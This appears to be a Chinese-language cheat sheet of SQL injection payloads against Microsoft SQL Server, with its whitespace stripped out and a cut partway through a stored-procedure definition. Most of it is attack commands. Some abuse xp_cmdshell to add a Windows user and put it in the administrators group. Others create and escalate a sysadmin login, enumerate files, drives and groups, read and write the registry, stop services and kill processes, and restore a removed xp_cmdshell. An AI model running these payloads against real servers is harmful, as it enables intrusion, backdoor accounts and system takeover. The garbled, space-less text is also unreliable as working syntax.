--是否存在xp_cmdshelland1=(selectcount(*)frommaster.dbo.sysobjectswherextype='x'andname='xp_cmdshell')--用xp_cmdshell执行命令;execmaster..xp_cmdshell"netusernamepassword/add"--;execmaster..xp_cmdshell"netlocalgroupnameadministrators/add"----查看权限and(selectIS_SRVROLEMEMBER('sysadmin'))=1--//saand(selectIS_MEMBER('db_owner'))=1--//dboand(selectIS_MEMBER('public'))=1--//public--创建个登陆mssql的帐号;execmaster.dbo.sp_addloginname,pass;----把创建的mssql登陆帐号提升到sysadmin;execmaster.dbo.sp_addsrvrolemembername,sysadmin;--有用的扩展--获得MSSQL的版本号//mssql版本executemaster..sp_msgetversion//dbopublic--得到硬盘文件信息//dbopublic--参数说明:目录名,目录深度,是否显示文件//读取磁盘目录和文件executemaster..xp_dirtree'c:'//列出所有c:\文件和目录,子目录executemaster..xp_dirtree'c:',1//只列c:\文件夹executemaster..xp_dirtree'c:',1,1//列c:\文件夹加文件--列出服务器上所有windows本地组executemaster..xp_enumgroups//dbo--得到当前sqlserver服务器的计算机名称//获得计算机名executemaster..xp_getnetname//dbopublic--列出指定目录的所有下一级子目录EXEC[master].[dbo].[xp_subdirs]'c:\WINNT'//可以列目录--列出服务器上固定驱动器,以及每个驱动器的可用空间executemaster..xp_fixeddrives//dbopublic--显示系统上可用的盘符executemaster..xp_availablemedia//dbo--获取某文件的相关属性executemaster..xp_getfiledetails'C:1.txt'//dbopublic--统计数据库里每个表的详细情况execsp_MSforeachtable'sp_spaceused''?'''//查询表//dbopublic--获得每个表的记录数和容量execsp_MSforeachtable'select''?''','?','sp_spaceused''?''','SELECTcount(*)FROM?'//dbopubilc--更新Table1/Table2中note列为NULL的值sp_MSforeachtable'Update?Setnote=''''Wherenoteisnull',null,null,null,'ANDo.namein(''Table1'',''Table2'')--列出服务器域名xp_ntsec_enumdomains//机器名//dbopublic--停止或者启动某个服务xp_servicecontrol'stop','schedule'//schedule是服务得名称//dbo--用pid来停止某个执行中的程序xp_terminate_process123//123是pid//dbo--只列某个目录下的子目录dbo.xp_subdirs'C:'//dbo--服务器安全模式信息xp_loginconfig//dboxp_regaddmultistringxp_regdeletekeyxp_regdeletevaluexp_regenumkeysxp_regenumvaluesxp_regreadxp_regremovemultistringxp_regwrite--将新扩展存储过程的名称注册到Microsoft?SQLServer?上。sp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'//恢复xp_cmdshell恢复过程sp_addextendedproc如下：createproceduresp_addextendedproc---1996/08/3020:13@functnamenvarchar(517),/*(o